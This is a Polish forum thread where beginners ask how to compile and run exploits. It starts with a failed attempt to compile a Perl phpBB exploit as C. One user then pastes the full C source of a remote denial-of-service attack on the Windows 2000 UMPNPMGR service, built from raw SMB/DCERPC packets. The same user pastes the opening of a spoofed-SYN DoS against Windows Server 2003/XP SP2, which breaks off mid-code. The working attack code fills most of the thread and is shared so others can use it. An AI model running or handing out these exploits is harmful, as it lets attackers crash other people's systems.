kompilacja

M

MrLovaLova

Użytkownik
Dołączył
Czerwiec 30, 2005
Posty
7
Witam,
czy moglby ktos wytlumaczy badz podac link na czym polega kompilacja i/lub poprawienie exploita ?
kompilowalem wlasnie

root@server:~# gcc phpbb2_0_15.pl.c -o phpbb
phpbb2_0_15.pl.c:1:2: invalid preprocessing directive #!
phpbb2_0_15.pl.c:2:3: invalid preprocessing directive #Wed
phpbb2_0_15.pl.c:4:3: invalid preprocessing directive #phpBB
phpbb2_0_15.pl.c:5:3: invalid preprocessing directive #The
phpbb2_0_15.pl.c:6:3: invalid preprocessing directive #Book
phpbb2_0_15.pl.c:7:3: invalid preprocessing directive #or
phpbb2_0_15.pl.c:9:3: invalid preprocessing directive #BLINK
phpbb2_0_15.pl.c:12:3: invalid preprocessing directive #Example
phpbb2_0_15.pl.c:13:3: invalid preprocessing directive #You
phpbb2_0_15.pl.c:14:3: invalid preprocessing directive #Tested
phpbb2_0_15.pl.c:16:3: invalid preprocessing directive #!
phpbb2_0_15.pl.c:21: error: parse error before "strict"
phpbb2_0_15.pl.c:21: warning: data definition has no type or storage class
phpbb2_0_15.pl.c:22: error: parse error before "IO"
phpbb2_0_15.pl.c:24: error: parse error before '[' token
phpbb2_0_15.pl.c: In function `unless':
phpbb2_0_15.pl.c:24: error: `print' undeclared (first use in this function)
phpbb2_0_15.pl.c:24: error: (Each undeclared identifier is reported only once
phpbb2_0_15.pl.c:24: error: for each function it appears in.)
phpbb2_0_15.pl.c:24: error: parse error before string constant
phpbb2_0_15.pl.c: At top level:
phpbb2_0_15.pl.c:26: error: `m' undeclared here (not in a function)
phpbb2_0_15.pl.c:26: error: parse error before '!' token
phpbb2_0_15.pl.c:28: error: parse error before "unless"
phpbb2_0_15.pl.c:29: error: `$1' undeclared here (not in a function)
phpbb2_0_15.pl.c:29: error: parse error before "unless"
phpbb2_0_15.pl.c:30: warning: parameter names (without types) in function declar
ation
phpbb2_0_15.pl.c:30: error: function `my' is initialized like a variable
phpbb2_0_15.pl.c:30: error: `$2' undeclared here (not in a function)
phpbb2_0_15.pl.c:30: warning: data definition has no type or storage class
phpbb2_0_15.pl.c:32: error: parse error before string constant
phpbb2_0_15.pl.c:38: warning: parameter names (without types) in function declar
ation
phpbb2_0_15.pl.c:38: warning: data definition has no type or storage class
phpbb2_0_15.pl.c:39: warning: data definition has no type or storage class
phpbb2_0_15.pl.c:40: error: parse error before '}' token
phpbb2_0_15.pl.c:44: error: syntax error before '{' token
phpbb2_0_15.pl.c:46: error: request for member `$_' in something not a structure
or union
phpbb2_0_15.pl.c:46: error: parse error before string constant
phpbb2_0_15.pl.c:48: error: parse error before string constant
phpbb2_0_15.pl.c:49: error: `IO' undeclared here (not in a function)
phpbb2_0_15.pl.c:49: error: parse error before ':' token
phpbb2_0_15.pl.c:54: warning: data definition has no type or storage class
phpbb2_0_15.pl.c:56: error: syntax error at '#' token
phpbb2_0_15.pl.c:56: error: syntax error at '#' token
phpbb2_0_15.pl.c:59: warning: data definition has no type or storage class
phpbb2_0_15.pl.c:60: error: parse error before '}' token[/b]
Kliknij aby rozwinąć...

i cos wywala za kazdy razem ;(
a ja nie mam juz pomyslu o co chodzi
z gory dzieki
 
D

DJBOSS666

Użytkownik
Dołączył
Luty 21, 2003
Posty
302
tak mi sie wydaje ze tego exploita sie nie kompiluje tylko zapisuje w pliku exploit.pl i odpala ./exploit.pl
smile.gif
ale to tylko moje domysły.

Pozdrawiam

DJBOSS666
 
M

MrLovaLova

Użytkownik
Dołączył
Czerwiec 30, 2005
Posty
7
a moglbys rozwinac swoja mysl ?
na czym polega to poprawienie bledow bo za bardzo nie jarze
<

bede wdzieczny
 
D

DJBOSS666

Użytkownik
Dołączył
Luty 21, 2003
Posty
302
Często exploity są dostosowane do danej dystrybucji (tak mi sie wydaje) zresztą nieraz bywa tak że (dosyć często) autorzy exploitów specjalnie popełniają jakieś proste błędy w kodzie exploita po to żeby nie namnażać script kiddies (chyba dobrze napisałem) więc pozostaje tylko nauczyć sie C
smile.gif
albo szukania już wersji exploita bez błedów.

Pozdrawiam

DJBOSS666
 
W

WalgO

Użytkownik
Dołączył
Czerwiec 11, 2004
Posty
495
czzęsto musisz wpisać dane dostosowane do swoich potrzeb , jakieś nr IP , adresy stron itp. czy zwykłe błedy tak jak DJBOSS pisze np. syntax error czyli błąd składni. poszukaj w necie i zobacz jaki error co oznacza a bedzie Ci już łatwiej 8)
 
R

Riddick1

Użytkownik
Dołączył
Grudzień 18, 2005
Posty
49
Originally posted by DJBOSS666
tak mi sie wydaje ze tego exploita sie nie kompiluje tylko zapisuje w pliku exploit.pl i odpala ./exploit.pl
smile.gif
ale to tylko moje domysły.

Pozdrawiam

DJBOSS666
Kliknij aby rozwinąć...


Wiem że to napewno gdzieś było ale nieumiem odszukać. Ale jak odpalić expolita.
 
R

Riddick1

Użytkownik
Dołączył
Grudzień 18, 2005
Posty
49
Originally posted by bobikrk
<div class='quotetop'>CYTAT
Kliknij aby rozwinąć...
Wiem że to napewno gdzieś było ale nieumiem odszukać. Ale jak odpalić expolita.
Kliknij aby rozwinąć...

Podstawy to są, to jest bardzo proste...[/b][/quote]


Ja wiem że to podstawy, ale ja dopiero zaczynam z tym i prosiłbym cie o pomoc, czy powiedział byś mi jak odpalić explita albo jakiś link do strony gdzie napisane jest podać.
 
K

ktostam

Użytkownik
Dołączył
Wrzesień 15, 2005
Posty
50
Móglby kto to skompilować ?? Mam modem i nie moge sciągnąć komplikatorów
<


Kod: 
/* Program: Denial of Service attack for MS UMPNPMGR PNP_GetDeviceList 

* Author: Winny Thomas 

* Vulnerability: no length checking on passed parameter to 

* PNP_GetDeviceList in UMPNPMGR.dll 

* Note: The code crashes services.exe on the target, effectively 

* bringing down the target against which its run. 

* This code is for educational/testing purposes by authorized persons 

* on networks systems setup for such purposes. 

* The author shall bear no responsibility for any damage caused by 

* using this code. 

*/ 



#include <stdio.h> 

#include <netinet/in.h> 

#include <netdb.h> 

#include <arpa/inet.h> 

#include <sys/socket.h> 



char SMB_Negotiate[] = 

"x00x00x00x85xFFx53x4Dx42x72x00x00x00x00x18x53xC8" 

"x00x00x00x00x00x00x00x00x00x00x00x00x00x00xFFxFE" 

"x00x00x00x00x00x62x00x02x50x43x20x4Ex45x54x57x4F" 

"x52x4Bx20x50x52x4Fx47x52x41x4Dx20x31x2Ex30x00x02" 

"x4Cx41x4Ex4Dx41x4Ex31x2Ex30x00x02x57x69x6Ex64x6F" 

"x77x73x20x66x6Fx72x20x57x6Fx72x6Bx67x72x6Fx75x70" 

"x73x20x33x2Ex31x61x00x02x4Cx4Dx31x2Ex32x58x30x30" 

"x32x00x02x4Cx41x4Ex4Dx41x4Ex32x2Ex31x00x02x4Ex54" 

"x20x4Cx4Dx20x30x2Ex31x32x00"; 



char SMB_Session_setup_ANDX1[] = 

"x00x00x00xA4xFFx53x4Dx42x73x00x00x00x00x18x07xC8" 

"x00x00x00x00x00x00x00x00x00x00x00x00x00x00xFFxFE" 

"x00x00x10x00x0CxFFx00xA4x00x04x11x0Ax00x00x00x00" 

"x00x00x00x20x00x00x00x00x00xD4x00x00x80x69x00x4E" 

"x54x4Cx4Dx53x53x50x00x01x00x00x00x97x82x08xE0x00" 

"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" 

"x57x00x69x00x6Ex00x64x00x6Fx00x77x00x73x00x20x00" 

"x32x00x30x00x30x00x30x00x20x00x32x00x31x00x39x00" 

"x35x00x00x00x57x00x69x00x6Ex00x64x00x6Fx00x77x00" 

"x73x00x20x00x32x00x30x00x30x00x30x00x20x00x35x00" 

"x2Ex00x30x00x00x00x00x00"; 



char SMB_Session_setup_ANDX2[] = 

"x00x00x00xDAxFFx53x4Dx42x73x00x00x00x00x18x07xC8" 

"x00x00x00x00x00x00x00x00x00x00x00x00x00x00xFFxFE" 

"x00x08x20x00x0CxFFx00xDAx00x04x11x0Ax00x00x00x00" 

"x00x00x00x57x00x00x00x00x00xD4x00x00x80x9Fx00x4E" 

"x54x4Cx4Dx53x53x50x00x03x00x00x00x01x00x01x00x46" 

"x00x00x00x00x00x00x00x47x00x00x00x00x00x00x00x40" 

"x00x00x00x00x00x00x00x40x00x00x00x06x00x06x00x40" 

"x00x00x00x10x00x10x00x47x00x00x00x15x8Ax88xE0x48" 

"x00x4Fx00x44x00x00xEDx41x2Cx27x86x26xD2x59xA0xB3" 

"x5ExAAx00x88x6FxC5x57x00x69x00x6Ex00x64x00x6Fx00" 

"x77x00x73x00x20x00x32x00x30x00x30x00x30x00x20x00" 

"x32x00x31x00x39x00x35x00x00x00x57x00x69x00x6Ex00" 

"x64x00x6Fx00x77x00x73x00x20x00x32x00x30x00x30x00" 

"x30x00x20x00x35x00x2Ex00x30x00x00x00x00x00"; 



char SMB_TreeConnect_ANDX[] = 

"x00x00x00x58xFFx53x4Dx42x75x00x00x00x00x18x07xC8" 

"x00x00x00x00x00x00x00x00x00x00x00x00x00x00xFFxFE" 

"x00x08x30x00x04xFFx00x5Ax00x08x00x01x00x2Dx00x00"; 



char SMB_NTCreate_ANDX_Request[] = 

"x00x00x00x66xffx53x4dx42xa2x00x00x00x00x18x07xc8" 

"x00x00x00x00x00x00x00x00x00x00x00x00x00x08xffxfe" 

"x00x08x40x00x18xffx00xdexdex00x10x00x16x00x00x00" 

"x00x00x00x00x9fx01x02x00x00x00x00x00x00x00x00x00" 

"x00x00x00x00x00x00x00x00x01x00x00x00x40x00x00x00" 

"x02x00x00x00x03x13x00x00x5cx00x62x00x72x00x6fx00" 

"x77x00x73x00x65x00x72x00x00x00"; 



char DCERPC_Bind_RPC_Service[] = 

"x00x00x00x9AxFFx53x4Dx42x25x00x00x00x00x08x01xC0" 

"x00x00x00x00x00x00x00x00x00x00x00x00x00x08xFFxFE" 

"x00x08x01x00x10x00x00x48x00x00x00x48x00x00x00x00" 

"x00x00x00x00x00x00x00x00x00x52x00x48x00x52x00x02" 

"x00x26x00x00x40x57x00x00x5Cx00x50x00x49x00x50x00" 

"x45x00x5Cx00x00x00x05x00x0Bx03x10x00x00x00x48x00" 

"x00x00x00x00x00x00xD0x16xD0x16x00x00x00x00x01x00" 

"x00x00x00x00x01x00x40x4Ex9Fx8Dx3DxA0xCEx11x8Fx69" 

"x08x00x3Ex30x05x1Bx01x00x00x00x04x5Dx88x8AxEBx1C" 

"xC9x11x9FxE8x08x00x2Bx10x48x60x02x00x00x00"; 



char PNP_GetDeviceList_Request[] = 

"x00x00x08x84xffx53x4dx42x25x00x00x00x00x18x07xc8" 

"x00x00x00x00x00x00x00x00x00x00x00x00x00x08xFFxFE" 

"x00x08x80x01x10x00x00x30x08x00x00x00x10x00x00x00" 

"x00x00x00x00x00x00x00x00x00x54x00x30x08x54x00x02" 

"x00x26x00x00x40x41x08xa2x5cx00x50x00x49x00x50x00" 

"x45x00x5cx00x00x00x00x00x05x00x00x03x10x00x00x00" 

"x30x08x00x00x01x00x00x00x18x08x00x00x00x00x0ax00" 

"x44xf7x12x00x00x04x00x00x00x00x00x00x00x04x00x00" 

"x48x00x54x00x52x00x45x00x45x00x5cx00x52x00x4fx00" 

"x4fx00x54x00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00x5cx00" 

"x5cx00x00x00x00x08x00x00x01x00x00x00"; 



char *setup_tCon(char *UNC, char *ptr) 

{ 

int pindex = 0, uindex = 0, len; 



len = strlen(UNC); 

while (uindex < len) { 

if ((pindex % 2) != 0) { 

ptr[pindex] = 'x00'; 

pindex++; 

continue; 

} 



ptr[pindex] = UNC[uindex]; 

uindex++; 

pindex++; 

} 



ptr[pindex] = 'x00'; 

pindex++; 

ptr[pindex] = 'x00'; 

pindex++; 

ptr[pindex] = 'x00'; 

pindex++; 

ptr[pindex] = 'I'; pindex++; ptr[pindex] = 'P'; pindex++; 

ptr[pindex] ='C'; pindex++; 

ptr[pindex] = 'x00'; 

pindex++; 

ptr[pindex] = 'x00'; 

pindex++; 

} 



int main(int argc, char *argv[]) 

{ 

struct sockaddr_in target; 

struct hostent *host; 

int sock; 

char response[4096]; 

char UNC[50], tConXpacket[150], *temp; 

char targetIP[20]; 

int nread, ret, templen; 



if (argc < 2) { 

printf("Usage: upnp_getdevicelist_DOS <host name|ip address>n"); 

exit(-1); 

} 





printf("n==========================================n"); 

printf("WIN2K UPNP interface DOS Attackn"); 

printf("Coded by Winny Thomas  n"); 



printf("==========================================nn"); 



printf("[*] Resolving %s: ", argv[1]); 

host = gethostbyname(argv[1]); 

if (host == NULL) { 

printf("033[0;31mFailed033[0;39mn"); 

exit(-1); 

} 

printf("033[0;32mOK033[0;39mn"); 



target.sin_family = AF_INET; 

target.sin_addr = *(struct in_addr*)host->h_addr; 

target.sin_port = htons(445); 



sprintf(targetIP, "%s", inet_ntoa(target.sin_addr)); 

sock = socket(AF_INET, SOCK_STREAM, 0); 

if ((ret = connect(sock, (struct sockaddr *)&target, 

sizeof(struct sockaddr))) < 0) { 

perror("Connect"); 

exit(-1); 

} 



printf("[*] SMB Negotiation with %s: ", argv[1]); 

if ((send(sock, SMB_Negotiate, sizeof(SMB_Negotiate)-1, 0)) < 0) { 

perror("SMB Negotiate"); 

exit(-1); 

} 

ret = recv(sock, response, 4096, 0); 

if ((ret < 10 || response[9] != 0)) { 

printf("033[0;31mFailed033[0;39mn"); 

exit(-1); 

} 

printf("033[0;32mOK033[0;39mn"); 



printf("[*] SMB Session setup ANDX 1 with %s: ", argv[1]); 

if ((send(sock, SMB_Session_setup_ANDX1, 

sizeof(SMB_Session_setup_ANDX1)-1, 0)) < 0) { 

perror("SMB_Session_setup_ANDX1"); 

exit(-1); 

} 

ret = recv(sock, response, 4096, 0); 

if (ret <= 10) { 

printf("033[0;31mFailed033[0;39mn"); 

exit(-1); 

} 

printf("033[0;32mOK033[0;39mn"); 



printf("[*] SMB Session setup ANDX 2 with %s: ", argv[1]); 

if ((send(sock, SMB_Session_setup_ANDX2, 

sizeof(SMB_Session_setup_ANDX2)-1, 0)) < 0) { 

perror("SMB_Session_setup_ANDX2"); 

exit(-1); 

} 

ret = recv(sock, response, 4096, 0); 

if ((ret <= 10 || response[9] != 0)) { 

printf("033[0;31mFailed033[0;39mn"); 

exit(-1); 

} 

printf("033[0;32mOK033[0;39mn"); 



temp = tConXpacket; 

printf("[*] SMB Tree Connect ANDX with %s: ", argv[1]); 

memcpy(tConXpacket, SMB_TreeConnect_ANDX, 

sizeof(SMB_TreeConnect_ANDX)-1); 

temp += sizeof(SMB_TreeConnect_ANDX) -1; 

sprintf(UNC, "%sIPC$", targetIP); 

setup_tCon(UNC, temp); 

templen = (strlen(UNC)*2) +9; 

tConXpacket[3] = 43 + templen; 

templen -= 2; 

memcpy((unsigned long *)&tConXpacket[45], &templen, 1); 

if ((send(sock, tConXpacket, (sizeof(SMB_TreeConnect_ANDX) + templen), 0)) < 0) { 

perror("SMB_TreeConnect_ANDX"); 

exit(-1); 

} 

ret = recv(sock, response, 4096, 0); 

if ((ret <= 10 || response[9] != 0)) { 

printf("033[0;31mFailed033[0;39mn"); 

exit(-1); 

} 

printf("033[0;32mOK033[0;39mn"); 



printf("[*] SMB NT Create ANDX Request to %s: ", argv[1]); 

if ((send(sock, SMB_NTCreate_ANDX_Request, 

sizeof(SMB_NTCreate_ANDX_Request)-1, 0)) < 0) { 

perror("SMB_NTCreate_ANDX_Request"); 

exit(-1); 

} 

ret = recv(sock, response, 4096, 0); 

if (ret <= 10) { 

printf("033[0;31mFailed033[0;39mn"); 

exit(-1); 

} 

printf("033[0;32mOK033[0;39mn"); 



printf("[*] DCERPC Bind to UPNP RPC Service at %s: ", argv[1]); 

if ((send(sock, DCERPC_Bind_RPC_Service, 

sizeof(DCERPC_Bind_RPC_Service)-1, 0)) < 0) { 

perror("DCERPC_Bind_RPC_Service"); 

exit(-1); 

} 

ret = recv(sock, response, 4096, 0); 

if (ret <= 10) { 

printf("033[0;31mFailed033[0;39mn"); 

exit(-1); 

} 

printf("033[0;32mOK033[0;39mn"); 



printf("[*] PNP_GetDeviceList request to %s: ", argv[1]); 

send(sock, PNP_GetDeviceList_Request, sizeof(PNP_GetDeviceList_Request)-1, 0); 

recv(sock, response, 4096, 0); 

printf("033[0;32mOK033[0;39mn"); 

}

i jescze to
smile.gif


Kod: 
/* 

Windows Server 2003 and XP SP2 remote DoS exploit 

Tested under OpenBSD 3.6 at WinXP SP 2 

Vuln by Dejan Levaja <dejan_@_levaja.com> 

(c)oded by __blf 2005 RusH Security Team , [url]http://rst.void.ru[/url] 

Gr33tz: zZz, Phoenix, MishaSt, Inck-vizitor 

Fuck lamerz: Saint_I, nmalykh, Mr. Clumsy 

All rights reserved. 

*/ 



//checksum function by r0ach 

u_short checksum (u_short *addr, int len) 

{ 

u_short *w = addr; 

int i = len; 

int sum = 0; 

u_short answer; 

while (i > 0) 

{ 

sum += *w++; 

i-=2; 

} 

if (i == 1) sum += *(u_char *)w; 

sum = (sum >> 16) + (sum & 0xffff); 

sum = sum + (sum >> 16); 

return (~sum); 

} 

int main(int argc, char ** argv) 

{ 

struct in_addr src, dst; 

struct sockaddr_in sin; 

struct _pseudoheader { 

struct in_addr source_addr; 

struct in_addr destination_addr; 

u_char zero; 

u_char protocol; 

u_short length; 

} pseudoheader; 

struct ip * iph; 

struct tcphdr * tcph; 

int mysock; 

u_char * packet; 

u_char * pseudopacket; 

int on = 1; 

if( argc != 3) 

{ 

fprintf(stderr, "r57windos.c by __blfn"); 

fprintf(stderr, "RusH Security Teamn"); 

fprintf(stderr, "Usage: %s <dest ip> <dest port>n", argv[0]); 

return EX_USAGE; 

} 

if ((packet = (char *)malloc(sizeof(struct ip) + sizeof(struct tcphdr))) == NULL) 

{ 

perror("malloc()n"); 

return EX_OSERR; 

} 

inet_aton(argv[1], &src); 

inet_aton(argv[1], &dst); 

iph = (struct ip *) packet; 

iph->ip_v = IPVERSION; 

iph->ip_hl = 5; 

iph->ip_tos = 0; 

iph->ip_len = ntohs(sizeof(struct ip) + sizeof(struct tcphdr)); 

iph->ip_off = htons(IP_DF); 

iph->ip_ttl = 255; 

iph->ip_p = IPPROTO_TCP; 

iph->ip_sum = 0; 

iph->ip_src = src; 

iph->ip_dst = dst; 

tcph = (struct tcphdr *)(packet +sizeof(struct ip)); 

tcph->th_sport = htons(atoi(argv[2])); 

tcph->th_dport = htons(atoi(argv[2])); 

tcph->th_seq = ntohl(rand()); 

tcph->th_ack = rand(); 

tcph->th_off = 5; 

tcph->th_flags = TH_SYN; // setting up TCP SYN flag here 

tcph->th_win = htons(512); 

tcph->th_sum = 0; 

tcph->th_urp = 0; 

pseudoheader.source_addr = src; 

pseudoheader.destination_addr = dst; 

pseudoheader.zero = 0; 

pseudoheader.protocol = IPPROTO_TCP; 

